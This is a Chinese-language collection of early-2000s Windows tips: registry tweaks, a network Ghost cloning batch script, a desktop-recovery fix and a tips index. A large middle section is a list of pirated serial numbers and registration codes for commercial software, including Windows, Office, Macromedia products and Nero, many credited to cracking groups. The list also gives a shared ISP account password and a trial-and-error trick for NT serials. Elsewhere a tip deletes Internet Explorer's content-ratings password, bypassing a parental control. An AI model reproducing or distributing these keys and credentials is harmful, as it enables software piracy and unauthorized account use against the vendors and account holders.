38 更改系统安装目录
    如果使用光盘安装Windows，当添加新的硬件时，系统配置驱动程序时会提醒需要在光驱中插入Win 98光盘，而且每次都 要这样做，的确太麻烦了。您可以将Win 98安装盘中的所有“*.CAB”文件都拷贝到硬盘的某个目录下，比如“D:\Backup\PWin98”，然后运行注册表编辑器，在“我的电脑”文件夹中依次选择“HKEY_LOCAL_MACHINE”、“Software”、“Microsoft”、“Windows”、“CurrentVersion”、“Setup”，将“SourcePath”主键的值改为“D:\Backup\PWin98\”，
重新启动计算机即可。 如果网络上有一个文件服务器，假定Win98安装盘备份在“D:\Backup\PWin98\”目录中，文件服务器的机器名为“MMX233”，D盘共 享名为“DiskD”，则将“SourcePath”主键值改为“\\MMX233\DiskD\Backup\PWin98\”，注销用户或重新启动Windows即可。

39 去掉IE内的分级审查口令
    首先找到在注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Currentversion\Policies\Ratings位置，这里保存的是IE下“Internet属性”对话框的“内容”选项页中的“分级审查”中的口令，该口令是经过加密的，在下图中你可以看到记录该口令的有两个键值，而二进制的“key”键值则是加过密的，去掉口令的方法即是将子键下的这两个键值删除，如果没有口令，这个子键无键值。下次进入IE，你就可以安全地进入分级审查，并且可以直接跳过输入“旧密码”，直接加入密码即可.

40 设置中文Windows内的系统语言
    如果你安装了一个英文游戏，并且不支持中文，例如QUAKE。就可以将中文Windows内的汉字按照英文一样来处理。比如每个汉字都被当成了两个字符来处理，删掉一个汉字也需要按两下删除键，而且每到行末，就会出现汉字丢掉一半的奇怪现象。如果遇到这样的情况，千万别着急重新安装Windwos，你还可以先试一试下面的方法。首先在注册找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\Nls\Locale的位置，将原来的“00000804”改为默认的“00000409”（系统默认使用的语言系统）.

注册表修改指南（五）
2000-06-27 00:00:00· 生哥·yesky

--------------------------------------------------------------------------------

41 更改IE标题栏中的文字
    首先在注册表中找到下面的位置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main，然后再新建一个字符串值，将其命名为Window Title
(注意两个词中间有一个空格）.

42 如何删除多余的DLL文件
    在WIN98的System子目录下存有大量的DLL文件，这些文件可能被系统或应用程序共享。但是由于经常安装和卸载软件，就会在System目录下留下一些DLL垃圾文件。它们不但占用了硬盘空间，而且还降低系统的运行速度。删除它们的步骤如下：
    1．运行“REGEDIT”， 打开注册表编辑器。
    2．打开
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedDLLs分支。
    这里SharedDLLs子键记录的就是有关程序共享的DLL信息，每个DLL文件的键值说明它已被几个应用程序共享。如果是二进制键值为“00 00 00 00”，则表明不被任何程序共享。（另外“0x00000001 （1）”是十六进制表示法）
    3．System目录中删除对应的文件。

43 去掉桌面快捷方式的小箭头
    在一些程序的安装过程中，会自动在桌面上创建该程序的快捷方式，方便了我们的使用。但是那个小箭头不太好看。我们可以利用修改注册表来去掉它。首先要注意此快捷方式是什么类型的，一般说来以.LNK居多，也有一些是.PIF（指向MS－DOS程序的快捷方式）。具体步骤如下：
    1．运行注册表编辑器，打开HKEY_CLASSES_ROOT\lnkfile分支。
    2．在lnkfile子键下面找到一个名为“IsShortcut”的键值，它表示在桌面的.LNK快捷方式图标上将出现一个小箭头。右键单击“IsShortcut”，然后从弹出的菜单中选择“删除”，将该键值删除。
    3．关闭注册表编辑器，重新启动Win98，就可发现快捷方式图标上已经没有小箭头了。
    同理，对指向MS－DOS程序的快捷方式（即.PIF）图标上的小箭头，则除了是打开HKEY_CLASSES_ROOT\piffile分支外，其余同上。


注册码、序列号！！！值得收藏！！！

《一键清理系统垃圾》

注册码、序列号！！！值得收藏！！！

登录奇兵 V3.01正式版－－用户名：CHINA　注册码：PD37ZFRZ5B39或者用户名：伪装者 注册码：P43DM1GHRYK3
登录奇兵 v2.01正式版－－用户名：wind[CCG] 注册码：PJ3L6HR44XJB
大掌柜 2.0－－用户名：crack2088.yeah.net 注册码：AKEAE9588
大富翁 5代－－安装序列号：6ef9d-33rut49ei6-dd8rt
Delphi6－－注册码:z9j8-pum4n-c6gzq 认证码:rw2-7jw
DHTML Menu Builder v3.0.x－－Name:king_KINK Company:CORE Code:E7E81B2ED721025B64D1B47235BA0131
Dimission 3.01－－sn:DJW301R2100011-348
Director 8.5－－SN:WDW850-02044-87235-26475
电脑播音员3.0－－SN:1949101
电脑幽灵（pcGhost 4.0 Beta 2）－－SN：abc-2972178
Dr.eye 2001 译典通－－序列号:DREYE2001-DYYVE-FBYML-ECDCFA-5739或者DREYENCT-DMYYE-FXCRL-ICHJAAJA-0067 或者 DREYE2001-DJYGF-F8Y7L-HIGBBIE-5681
Drive Imager DriveStar 2.24 －－Name:UNREGISTERED! Code:DS1-E3B5N-ED81U-BB7D
Drive Imager DriveStar 2.25－－Name:UNREGISTERED! Code:DS1-E3B5N-ED81U-BB7D
Dreamweaver 4.0 完全正式版－－安装授权号：DWW400-03771-57289-73501
Dreamweaver UltraDev 4.0－－安装授权号： UDW400-06066-07241-71420
DynSite 1.10.402.5－－Name:Free User Code:40341-372
E TOP
Easy CD Creator 5.02 Platinium－－s/n: G-332NB-MGJNH-ZFVPB
Easy CD Creator 5.0 Platinium retail iso－－sn:P-7TGQ4-G06CM-N5G1L或者s/n: Y-73YHY-SENW9-Y9B4T
Eudora Pro 5.1－－First Name:Free Last Name:User Code:49389945-64998697
EZCard－－Name:www.dyiyd.com SN:3ABC95AC-8A1B800A
Easy CD-DA Extractor 4.5.0－－Key:4C727B510833361F Check Key:EZDCGCJSDM
EmEditor 3.15－3.17－－SN:1710-6480-9217-5957或者1710-6480-9217-5957或者1711-4163-2570-2342或者1715-6607-8393-5012或者1716-2860-3457-3572或者1719-3050-7874-232
EmEditor 3.14简体中文安装版－－SN:1710-6480-9217-5957
F TOP
Fast Browser v3.7(0708)注册方法--运行注册表regedit,找到以下分支结构[HKEY_CURRENT_USER\Software\Sealine\fb37\user] ，键值设定为fb0071753，即完成注册。
Fast Browser v3.4.0402－－sn:fb0088698 Registration Code: 513464385342285
Fine Print 2000 V4.0 Build 49 Win9x/Me－－SN:P4QX-XAGA-2U83
Fine Print 2000 V4.0 Build 45 Win9x/Me－－Code:P4QX-XAGA-2U83
Fine Print 2000 V4.0 Build 45 WinNT/2000－－Code:JFVT-SNGN-TLMJ
Flashplay 1.0注册码－－用户名：gfh[CCG]　注册码：2FE415EA0995
Fireworks 4.0 完全正式版－－安装授权号：FWW400-02666-67248-02548
Flash 5.0 最终正式版－－序列号FLW500-13547-37838-54321 或者 FLW500-03143-77238-80660
Flash 32 V3.09－－Name:DiABLO First Name:ORiON Key:3368081640
FlashSoft(下载软件管理盒) V1.06－－用户名www.crackbest.com 注册码：873359396
Folder Guard Pro 5.2－－Name:flysnow Copies:1239 S/N: F339212448864
Folder Guard 5.1a －－Name:flysnow Copies:1239 S/N:F339212448864
Frontpage2000 简体中文正式版－－序列号：K3KT9-267PT-4THHF-Q69R3-FRXY6 或者 J2MV9-JYYQ6-JM44K-QMYTH-8RB2W 或者 00120804-78E1-11D2-B60F-006097C998E7
FreeHand 9.02－－SN:FHW900-00010-47278-88947
FreeHand 10－－SN:FHW100-00654-47258-19356
伏羲服装鞋业购销存管理系统3.03－－单位名称www.crackbest.com 注册码:66612-45289-67929-48834-36429
沸点计算机专业词汇学习系统1.0版－－注册名：copyyour 注册码：372072
沸点群发邮件 1.1－－注册名：copyyour 注册码：372072
沸点远程控制 1.0－－注册名：copyyour 注册码：372072
沸点时间设置工具－－注册名：copyyour 注册码：372072
沸点网络地址探测器－－注册名：copyyour 注册码：372072
沸点算命 1.0－－注册名：copyyour 注册码：372072
FlashGet(网际快车) v0.96广告破解－－姓名FLASHGET 注册码:22029EC2M7
FlashGet(网际快车) v0.95广告破解－－姓名FLASHGET 注册码:22029EC2M7
FlashGet(网际快车) v0.94广告破解－－姓名FLASHGET 注册码:22029EC2M7或者Name:among Code:39065EG6Q5
FlashGet(网际快车) v0.93广告破解－－姓名FLASHGET 注册码:22029EC2M7
G TOP
GIF Construction Set Pro 2..0.21a－－Name:Free User Code:20702-74-20078-96
GoldWave 4.25－－First Name:FREESOFT Last Name:FREESOFT Code:GELUUWB
GoldWave 4.24－－First Name:FREESOFT Last Name:FREESOFT Code:GELUUWB
光驱精灵 1.35 注册码－－用户名：www.cracknow.com 注册码：ugxbcCzfreuvcXvf 或者注册名：kjjxy 注册码：DekpAzmFWuhjZuiU
光驱精灵.NET 1.2.0.5 注册码－－用户名：www.cracknow.com 注册码：ugxbcCzfreuvcXvf 或者注册名：kjjxy 注册码：DekpAzmFWuhjZuiU
光科II婚纱设计－－运行号:4C-08-75-05-70 5D-C9-D4-F9-FD
Gif Movie Gear v2.63－－Name: NelviN [e!] S/n: mvg20003492
Gif Movie Gear v2.62－－Name: Blackstar TRPS98 S/n: mvg2sccy1679
Gif Movie Gear v2.61－－Name: Versus S/n: mvg2svrs0574
Galley Master MM for Adobe PageMaker－－sn:50336-150-77196444
Galley Master XD for Adobe PageMaker－－sn:70336-150-97196444
Genesis－－sn::44444 autoriznatincode:2077229778
GetRight v4.5 Beta 5a－－SN:941829970387
GetRight v4.5 Beta 4－－SN:941829970387
GetRight v4.5 Beta 3－－SN:941829970387
GetRight v4.5 Beta 2－－SN:146647922132
H TOP
Harddisk Partitioner PartitionStar 1.36－－Name:UNREGISTERED! Code:PS1-E389N-ED81U-BB7D
hell o Engines 2.5.7－－SN:6E31020001000000
HappyEO电子琴2.40注册码－－注册名：CrackerABC[BCG] 地址：中国破解组织-[BCG] 注册码：KYO09O
HTML (Un)Compress 6.1.2－－Name:stcsr Code:yJ9A5R0W或者Name:CZY Code:n1KqBy0M
HyperSnap-DX 4.10 beta 9－－名称：Goodman 授权类型：无限制的世界范围授权代码：QKFP-WLDZ-DVMM-LMQK-MRAC-RBRK
火焰屏保Particle Fire 2－－注册码：2222222222
慧琦网通6.80专业版－－安装密码： dialnet Name:hotworld@21cn.com Number:AHF000186 Password:2QWRCh5u
慧琦网通 6.5.1.22β版－－用户名：gfh 用户号：121212 注册码：EGCRJX2q
黑马智能课表管理系统2.20－－Name:www.crackbest.com SN:4677-2323-8115-187
呼吸小秘书特效1.2版万能注册码－－注册名：任意 万能注册码：BSJG08SN01234或BSJG08SN08888 collected by winzheng
环球商务信息发布系统 v1.30中文版注册号－－姓名www.crackbest.com 密码：1777
环球商务信息发布系统 v1.20注册码－－用户名：CrackerABC[BCG] 注册码：1342
I TOP
ICE Player（音画时尚） 2.6－－注册码:PL68A-yhss-style-98566-55860 6615-FCJX-LDgs-155868-ice260a
Icon Extractor 3.4－－Name:Predator Comp:Faith2000 Code:4013600549
Internet Security and Acceleration (ISA) Server 2000－－注册信息：4156-000000
Image Optimizer 3.5－－SN:709fyfbc
IQ搜索王－－注册码：00397434468
Illustrator 9.0繁体中文版－－sn:ABT800R7100102-625
Illustrator 8.0中文版－－sn:ABW800X7102095-685或者sn:EXX500R5900103198-517
Iparmor(木马克星)4.20 简体中文版－－Name: Ambition s/n: 360267856 or Name: Kyr0N [FHCF] s/n: -112361794
Iparmor(木马克星)4.15 DEMO英文版－－code:七味小路 key:-387786076
Iparmor(木马克星)4.40－－Name: Ambition s/n: 360267856 or Name: Kyr0N [FHCF] s/n: -112361794
Iparmor(木马克星)3.30－－Name:白菜乐园 SN:1225455794
Iparmor(木马克星)3.24－－Name:七味小路 SN:387786076
Iparmor(木马克星)3.23－－Name:七味小路 SN:-387786076
J TOP
金山毒霸II 2001正式标准版－－SN:KAV026-110000-428123-807600
金山毒霸2001.net 钻石会员版－－安装序列号:KAV00-69254-10624
金山毒霸2001.net正式版－－序列号：KAV00-55610-58546
金钥匙证券投资智能决策系统 1.2专业版－－安装卡号:cjx1681688
计算机软件水平考试系列软件－－注册名：copyyour 注册码：372072
计算机等级考试一级自测软件－－注册名：copyyour 注册码：372072
精科电脑算命 1.1－－注册码:37C9FCB7
JetCar(FlashGet)v0.95广告破解－－姓名FLASHGET 注册码:22029EC2M7
JetCar(FlashGet)v0.94广告破解－－姓名FLASHGET 注册码:22029EC2M7 或者 Name:among Code:39065EG6Q5
JetCar(FlashGet)v0.93广告破解－－姓名FLASHGET 注册码:22029EC2M7
K TOP
开心斗地主V2.3 build 170－－注册名：IceWorld 注册码：3324215076或者注册名：刘健英 注册码：4521281151
开心斗地主v1.6s－－Name:飞碟网络 SN:cn.coc.cc>http://ufcn.coc.cc
开心斗地主v1.5(sd)－－Name:飞碟网络 SN:cn.coc.cc>http://ufcn.coc.cc
开心斗地主v1.5(sc)－－Name:飞碟网络 SN:cn.coc.cc>http://ufcn.coc.cc
开心斗地主v1.5(S9)－－Name:飞碟网络 SN:cn.coc.cc>http://ufcn.coc.cc
开心斗地主v1.5(S8)－－Name:飞网用户 SN:ufcn.coc.cc
开心斗地主v1.5(S7)－－Name:CHINA SN:b|f|p
开心斗地主v1.5(S6)－－Name:测试用户 SN:AL5078BYCT
KingCopy 2.5-- 用户名:风飘雪[CCG] 注册码:KC25-E781AEFBA97D432B47或者用户名:www.crackbest.com 注册码:KC25-7157102E695257432342
KoolMoves 1.95-- Name:Free User Code:643XKJlvJS
KYODAI MAHJONGG(四川省麻将) v15.25-- 注册名:http://dyiyd.yeah.net 注册码:002805471661672810617 或者 注册名：Free User 注册码：445237065
L TOP
LeapFTP 2.71.580--Name:CZY Code:MOD1-MO2D-M3OD-NOPQ
亮点压缩 2.0－2.01－－用户名：绝密档案 公司名：http://hongjian.126.com 序列号：00000-00000-00000-00000 注册码：B69F6－A6871－75797－D8185
联想163免费上网帐号-- Name:legend0387k Password:n0ze8xvl
M TOP
MP3 CD Maker 1.40多语言版－－Name:CZY Code:3543442950
MyBase v4.56－－用户名fpx.yeah.net 注册码R6J7-SB3D-7YK4-XBHA
MightyDAC 1.3.6 #5－－Name:FREE@FREE.COM SN:J4NJWSSMTH
MagicWin 1.3f(05/01)－－Name:tiger Num:1234567 Code:123HJLJ544
Macromedia Director 8.5--SN:WDW850-02044-87235-26475
Macromedia Dreamweaver 4.0 完全正式版--安装授权号：DWW400-03771-57289-73501
Macromedia Dreamweaver UltraDev 4.0-- 安装授权号：UDW400-06066-07241-71420
Macromedia FreeHand 9.02-- sn:FHW900-00010-47278-88947
Macromedia Freehand 10--SN:FHW100-00654-47258-19356
Macromedia Fireworks 4.0完全正式版-- 安装授权号：FWW400-02666-67248-02548
Macromedia Flash 5.0最终正式版-- 序列号FLW500-13547-37838-54321 或者 FLW500-03143-77238-80660
Magic Set（超级兔子魔法设置）3.92简体中文版－－Name：随便 Code：CXMS-AYILVBXDOEG
Magic Set（超级兔子魔法设置）3.91简体中文版－－Name: Sun Bird Code: CXM-AYYABBXDSPG
Magic Set（超级兔子魔法设置）3.9简体中文版－－Name: Sun Bird Code: CXM-AYYABBXDSPG 或者用户名：我爱蔡兔子:) 密码：CX-BBBAWBETUVB
Magic Set超级兔子注册表优化v4.12增强版－－Name:Only For Chinese Code:AFABXBCVWXB或者Name:conanxu[BCG] Code:conanxu[BCG]
Magic Set超级兔子魔法设置v3.88简体中文版完美注册－－Name: Sun Bird [CCG] Sn: CX-AYYABBPDOLG
Magic Set超级兔子魔法设置v3.88中文版－－Name:swnetcn17 Code:SPQHQRSWOXW或者Name:Only For Chinese Code:AFABXBCVWXB或者Name:purewom Code:2Y2PMEFG3或者Name:Al Gore Code:1W1IFHIJ8或者Name:Bauer Lindemann Code:3U5YVLMN6或者Name:蔡旋 Code:ABASGBCXMCB
Magic Set（超级兔子魔法设置）v3.86中文版－－Name:Only For Chinese Code:AFABXBCVWXB或者Name:purewom Code:2Y2PMEFG3或者Name:Al Gore Code:1W1IFHIJ8或者Name:Bauer Lindemann Code:3U5YVLMN6
Magic Set（超级兔子魔法设置）V3.85多语言版－－注册码：NAME：swnetcn17 CODE：SPQHQRSWOXW（适用于简体中文版的超级兔子魔法设置），注册表优化可以用conanxuBCG的注册码：AFABXBCVWXB，注册名任意。修理专家：任意注册 终极加速：任意注册。 或者Magic Set 简体中文版：name:ONLY FOR CHINESE code:AFABXBCVWXB 开放全部功能，ONLY FOR CHINESE大小写任意 RegOpt 4.11 注册内容同Magic Set 简体中文版 另两个东西注册信息随便填
Magic Set(魔法设置)3.85英文版－－name:Al Gore Code:1W1IFHIJ8
Magic Set 3.8 for 9x/Me/2K(魔法设置)－－注册名www.superr.net 注册码：Magic Set
Magic Set（超级兔仔魔法设置）－－注册名:EGIS 注册码:JVJDAGFGHT 或者 注册名：YOUYOU 注册码：MNWTUTUVE
Mdaemon Pro 4.0 无限用户正式版－－注册码：GDPFFMF-QAWLYFJ-XQDIYAO
MightyDAC 1.3.5 Build3－－Name:FREE@FREE.COM Code:J4NJWSSMTH
MightyDAC 1.3.5 Build2－－Name:FREE@FREE.COM Code:J4NJWSSMTH
MightyDAC 1.3.4 Build2－－Name:FREE@FREE.COM Code:J4NJWSSMTH
Milpas 词痴 v1.1－－注册名www.dyiyd.com 注册码：194394184064284305784305284064105105105
Moony 2.10－－SN:HQVLU-AQVMZ-MYW-FWI
美萍反黄专家 2.26版－－软件序列号：88888888 注册号：35355
美萍反黄专家 V1.1－－软件序列号：88888888 注册号：35355
魔法转换 v1.5 build 0401－－注册名：Nicsoft 注册码：4E0E6915631C73236F2A66317438
Multimedia Builder MP3 4.8 Beta 5－－Name:HBK@heartbreak.net Code:1-274983-415
MusicMatch Jukebox 6.00.4044a－－SN:WRJWH-9394G-7W7QH-A2G7R 或者 SN:1245C-54601-54B48-EC510
Microsoft WindowsXP 2520 Pro 英文版－－60天免激活序列号：RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ
Microsoft Windows XP 2505 RC1－－序列号：DTWB2-VX8WY-FG8R3-X696T-66Y46 Q3R8Y-MP9KD-3M6KB-383YB-7PK9Q 411Y0-URB45-34R3B-310N6-70U51 F0R6R-347JU-57IC3-M0V34-11Z16 50M38-0DY53-7UPU5-7H380-M8111
Microsoft Windows whistler Beta2 build 2428－－CD Key: RBDC9-VTRC8-D7972-J97JY-PRVMG
Microsoft Whistler Person build 2410－－ SN：F6PGG-4YYDJ-3FF3T-R328P-3BXTG
Microsoft Windows Mellinium(Windows Me)简体中文最终正式版－－s/n: B6BYC-6T7C3-4PXRW-2XKWB-GYV33
Microsoft Windows2000 Professional 中文版－－SN：PQHKR-G4JFW-VTY3P-G4WQ2-88CTW
Microsoft Windows 2000 Server－－CD-KEY:H6TWQ-TQQM8-HXJYG-D69F7-R84VM
Microsoft Windows98序列号－－K4HVD-Q9TJ9-6CRX9-C9G68-RQ2D3
Microsoft WindowsNT Server4.0－－CDKEY:727-1111111
Microsoft WindowsNT workstation－－输入任意合适数目的数码后,最后一 位从0到9试一遍,最多试十次即可。
Microsoft Office 2000 简体中文企业版－－序列号： J2MV9-JYYQ6-JM44K-QMYTH-8RB2W
Microsoft（微软）通用序列号－－
微软OEM通用序列号 425-1234567
微软OEM通用序列号 03697-0020401-XXXXX(X为任意数)
微软服务器通用序列号 020-0123456(Exchange Server等)
微软OEM通用序列号 11000-0123456-11000
微软OEM通用序列号 00100-0123456-00100
微软通用序列号 1112-1111111
微软通用序列号 0123-0123456
微软通用序列号 425-0052563(VB,VC等)
微软通用序列号 425-0022172(PWin95,PVFP,PVB)
微软通用序列号 400-1234567(后7位任意)
微软通用序列号 000-1234567
微软通用序列号 757-1234567
微软通用序列号 755-1234567
微软通用序列号 727-1111111
微软通用序列号 111-1111111
微软通用序列号 123-1234567
木马克星(Iparmor)4.20 简体中文版－－Name: Ambition s/n: 360267856 or Name: Kyr0N [FHCF] s/n: -112361794
木马克星(Iparmor)4.15 DEMO英文版－－code:七味小路 key:-387786076
木马克星(Iparmor)4.40－－Name: Ambition s/n: 360267856 or Name: Kyr0N [FHCF] s/n: -112361794
木马克星(Iparmor)3.30－－Name:白菜乐园 SN:1225455794
木马克星(Iparmor)3.24－－Name:七味小路 SN:387786076
木马克星(Iparmor)3.23－－Name:七味小路 SN:-387786076
魔装网神2001（NetMyth）v2.9－－注册名：guodong 注册码：215877F 或者 注册名:cvh520 注册码:1c11471
魔装网神2001（NetMyth）v2.8－－注册名：dyiyd 注册码：17E4CBD
魔装网神2001（NetMyth）v2.7－－注册名：dyiyd 注册码：17E4CBD
魔装网神2001（NetMyth）v2.6－－注册名：dyiyd 注册码：17E4CBD 或者 注册名:wind 注册码:1260457 或者 Name:CHINA Sn:166B031
魔装网神2001（NetMyth）v2.5－－注册名：dyiyd 注册码：17E4CBD 或者 注册名:wind 注册码:1260457
N TOP
NetCaptor Pro v6.5.0 beta 0－NetCaptor Pro v6.5.0 beta 8通用序列号－－SN：13064036或者sn:21199609
Net Optimizer v3.0 RC2－－sn:28031979-ph-17081945
Nero Burning ROM 5.5.1.8官方正式版－－Code:1404-1000-0564-0564-7701
Nero Burning ROM 5 iso－－sn:100012-095795-479579-222860
NetObjects Fusion MX 6－－sn:NFW-600-R-073-02169-43559
Nautilus NetKit(鹦鹉螺网络助手)v2.20中文版－－Name:husoft Code:rkdwpibung 或者 Name:nicsoft code:mfyrkdwpib
Nautilus NetKit(鹦鹉螺网络助手)v2.11中文版－－注册名：dyiyd [CCG] 注册码exqjcvohat
南极星 2.23－－user:ldr company:http://unreally.yeah.net 注册码:4581-0495-2953-6078


自动GHOST的参数！想自动网络GHOST的来看！

《一键清理系统垃圾》

自动GHOST的参数！想自动网络GHOST的来看！

建个批处理！
第一行加载网卡驱动
第二行ghost后加参数，-clone指的是克隆，mode=后面跟的如是LOAD指整盘克隆；如是PLOAD指克分驱！ SRC=@mc后面跟的是服务器的名字，这里是“1”，dst=后的“1”指目标盘为第一个硬盘sze1=1506m指第一分驱的大小为1506M
sze2=36656m指的是第二个分驱为36656M ， -crcignore 为忽略CRC校验，可以不要，-sure 为所有的OK都直接确定！

我的BAT文件如下：
8139 0x60 100full
ghost -clone,mode=load,src=@mc1,dst=1,sze1=1506M,sze2=36656M -crcignore -sure

还有如果你装了网络还原精灵可以把这个批处理的名字改为 autoexec.bat。
然后把你启动盘中的：
8139.com
autoexec.bat
config.sys
msdos.sys
ghost.exe
通过还原精灵的传到客户机上！这样一重起哈，所有的机子直接进入GHOST等待状态。
注意了，你的服务器必须开了DCHP！

谢谢大家的关注，现在我把我编的这部分程序放出来让大家试试，如果有什么问题的话，请联系我！

说明文件
阿卡修改版网络克隆工具！

Usage: gg [/i NUM(1~254)] [/m NUM(1~5)] [/s server-name]
Options:
/i is ip address, number 1 to 254.
/m is disk mode, number 1 to 5 ,deffeng is 5 img to disk
/s is ServerName,def is aka_zhang
example1:
gg
example2:
gg /i 200
example3:
gg /m 3 -i 254
example4:
gg /s test /m 1 /i 26

说明：
1。在默认下（指输入gg）：IP地址由DCHP服务器自动分配，NETGHOST服务器名为aka_zhang，整盘网克！
2。本程序有三个参数为 /i,/m,/s
/i指IP地址，比如你输入的为/i 5（中间有空格）指IP地址为 192.168.0.5
/m指克盘的模式，/m的参数值在1~5之间：1为将镜像克到第1个硬盘的第1分区，2为将镜像克到第1个硬盘的第2分区，3为将镜像克到第 1个硬盘的第3分区，4为将镜像克到第1个硬盘的第4分区，5为将整盘镜像克到第1个硬盘。
/s指netghost的服务器名，默认下服务器名为aka_zhang
3. /? 为帮助，如果在DOS下还有不清楚的可以看看！
4. 如果你使用的不是8139的网卡，编辑netcard.bat文件，将8139改为你的网卡的DOS驱动!
5. 将这些文件解压到你的ghost.exe所在的目录！

如果你在使用中出现什么问题请联系:aka_zhang@eyou.com
如果你不只2个分驱，可以在sze2=36656M 后加上sze3=nM

上面帖子中的 1506M 36656M ，是我的40G硬盘的分驱，在网克前改成你硬盘的分驱大小！


自动找回丢失的Windows桌面

《一键清理系统垃圾》

返回总目录 上一页 目录页

自动找回丢失的Windows桌面

    大家在使用Windows的过程中，经常会遇到Explorer崩溃后丢失桌面外壳（Shell）的情况，每次都要手工恢复桌面外壳，这会很烦！其实，只要在注册表中做一点小小的修改，那么每次在你的Explorer崩溃之后，Windows就会自动恢复桌面。运行注册表编辑器regedit.exe，找到下面这个注册表子键：
    如果操作系统为Win9X的话：
    HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon
    如果操作系统为Windows NT 的话：
    HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon找到该子键后，修改键值：AutoRestartShell（如果它不存在，就在右边窗口点击鼠标右键，新建该键值）。这个键值的类型为REG_DWORD类型，把该值设置为1（0表示禁止自动恢复），这样在Explorer崩溃之后，Windows就会自动恢复桌面了。


电脑小技巧

《一键清理系统垃圾》

返回总目录

电脑小技巧

◎“Shift”键在Word中的妙用
◎“擦除”搜索记录痕迹的五种技巧
◎【Windows】攻略大全
◎CSS层叠样式淡化图象
◎FTP使用精萃
◎备份前的准备工作非常重要：
◎ghost的使用技巧
◎IE浏览器八大经典故障写真集
◎IE四个经典故障及其解决方案
◎IE选项注册表控制大全
◎让IE以最大化显示
◎IPC$命令详解
◎IP地址常识
◎IP寻址技术
◎js写入文字
◎邹从静 传奇游戏 服务器 启动
◎NT局域网内的DNS解析及配置
◎OSI七层网络模型与TCP/IP四层网络模型
◎PNP无盘的快速安装方法
◎raid简介
◎Realone 解码器 FOR Windows Media Player
◎Rundll.exe 高级应用
◎SF减少M2卡机的方法
◎Shell使用技巧两则
◎SMART与菜鸟刻盘
◎USB技术白皮书
◎Win9x下系统资源的解释和分析
◎Win9x注册表小技巧
◎Windows9X注册表揭密
◎Windows 9x也可远程控制
◎Windows 2003 激活和优化
◎Windows NT 错误代码(二)
◎Windows NT 错误代码(一)
◎WINDOWS SERVER 2003应用技巧集
◎Windows 罕见技巧全集大放送
◎排忧解难 Windows操作系统十二则高级技巧
◎Windows出错信息解析及解决方案
◎Progman　程序管理器(可以运行程序)
◎Windows技巧二则
◎Windows任务栏的妙用
◎Windows网络命令之NET SESSION小档案
◎Windows系统命令提示符八大特别技巧
◎Windows系统权限
◎Windows系统中鲜为人知的宝藏之程序篇
◎Windows系统中鲜为人知的宝藏之文件夹篇
◎Windows中的DOS
◎Xwindow使用技巧三则
◎摆脱IE 6.0的噩梦
◎并不疯狂的禁止
◎不可不会的NT注册表修改技巧
◎[转帖]查看开放端口判断木马
◎编辑注册表
◎端口可分为3大类：
◎电脑高手应用技巧大荟萃
◎电脑上的小技巧
◎电脑上的小技巧
◎电脑维修的基本方法
◎动态IP地址的捕获及应用
◎对“缓存”的全面理解和优化
◎恶意网站怎么消除
◎Windows XP 控制台命令详解
◎Win XP高级技巧与应用
◎Windows XP隔离组件和并列共享
◎更改IE的默认搜索引擎
◎工作站PC配置详细步骤
◎共享也能隐藏
◎关闭程序时关闭其DLL文件
◎恢复Windows Me中的丢失文件
◎机箱内部线路的整理以及优化技巧
◎计算机总线技术基础知识（二）
◎计算机总线技术基础知识（三）
◎计算机总线技术基础知识（一）
◎Windows XP减肥加速系列--------加速篇
◎家庭无线网络安全七点小技巧
◎Windows XP减肥加速系列--------减肥篇（1）
◎教你Word文档丢失的预防与数据的恢复
◎教你技巧：机房共享上网应用全接触
◎解读引导文件BOOT.INI
◎IE无法打开二级链接
◎IE浏览器常见经典故障
◎解释Windows 碎片对象（.SHS）
◎Win XP控制台命令详解
◎快速拨号上网有技巧
◎利用WINRAR自解压包进行网吧日常更新详解
◎没法选中汉字输入法的原因
◎妙用Windows 9x的Desktop.ini文件
◎妙用右键 提高效率
◎Windows XP 控制台命令详解 - 目录和文件操作命令
◎你真的会安装驱动顺序吗？
◎喷打加墨技巧集锦
◎喷打省墨技巧三例
◎破解IE分级密码
◎浅析系统网络管理经验之五大问题
◎巧消风扇噪音
◎巧用Rundll32安装/卸载Windows程序
◎巧用Windows“查找”命令
◎轻松解决多操作系统中的文件转换问题
◎全方位堵住Windows 2003的安全隐患
◎全面彻底的优化Windows2003sev
◎全面优化Win 9x系统性能
◎全面掌控无线局域网安全技巧
◎让Windows学会自我保护
◎让你的IIS无懈可击
◎认识Windows的GPF错误
◎任务管理器杀不了的进程关闭大法
◎任意放置你的“控制面板”
◎如何打开注册表编辑器（从Win98到WinXP）
◎如何恢复出错的输入法
◎如何设计网页
◎如何实现网络分段
◎如何使IE不再发送错误报告
◎重新安装IE浏览器
◎软盘起死回生小技巧
◎Windows XP下扫描仪的安装和使用
◎删除右键菜单的内容
◎闪盘不可以随便拔吗
◎慎用还原Wpa.dbl文件
◎什么是kernel32内核文件
◎使用QChain在Windows中安装多个修补程序
◎手工删除多余的DLL文件
◎输入法顺序调整
◎谁在偷窥我的电脑？
◎随意改动文件与程序的关联
◎提高系统安全的注册表修改秘籍
◎网吧IP自动修改程序
◎网吧管理十大漏洞嚗光
◎网管维护局域网技巧大汇总
◎网络故障分层排查的高级技巧
◎网络连接和测试
◎小型局域网故障诊断必读
◎网页恶意代码的手工处理
◎微软提供的超级大餐
◎电脑内不可改名的方法
◎无盘/终端教案
◎Windows XP 控制台命令详解 - 系统和磁盘操作命令
◎限制Win9X/NT系统功能二十六招
◎谣言惑众-几个著名的伪优化
◎隐藏控制面板选项又一法
◎隐藏你的桌面
◎安装 Windows XP 后硬件不兼容的处理
◎用好你的“系统信息”
◎用系统策略编辑器实现多用户管理
◎有问必答
◎有问必答
◎有问必答
◎有问必答
◎运行菜单中的“快捷方式”
◎在Win 9X下轻松替换使用着的文件
◎重装操作系统20条"原则"【必看】
◎注册表修改指南（一）
◎注册码、序列号！！！值得收藏！！！
◎自动GHOST的参数！想自动网络GHOST的来看！
◎自动找回丢失的Windows桌面

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


4.2.5 常用邮件、图片、影像、ZIP、MS Office、声音文件的修复

